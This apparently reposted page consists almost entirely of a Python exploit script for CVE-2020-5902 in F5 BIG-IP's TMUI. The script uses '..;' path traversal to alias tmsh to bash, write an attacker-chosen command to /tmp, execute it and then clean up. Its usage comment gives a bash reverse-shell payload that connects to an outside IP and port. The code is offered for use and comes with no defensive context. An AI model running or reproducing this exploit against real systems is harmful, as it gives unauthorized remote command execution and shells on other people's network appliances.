cve-2020-5902

# cve-2020-5902

“`
import requests
import sys
import random
# python exp.py “https://1.2.4.1:22212/” “bash+-i>%26+/dev/tcp/1.1.2.3/23333+0>%261″
ip = sys.argv[1]
cmd = sys.argv[2]
num_str = ”.join(str(random.choice(range(10))) for _ in range(8))

poc1_url = “/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash”
poc2_url = “/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content=%s” %(num_str,cmd)
poc3_url = “/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/” + num_str
poc4_url = “/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp%2f” + num_str

poc5_url = “/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list”
poc_lists = [poc1_url,poc2_url,poc3_url,poc4_url, poc5_url]
for poc in poc_lists:
try:
content = requests.get(url=ip+poc, verify=False).content
print(content)
except Exception as e:
print(e)
“`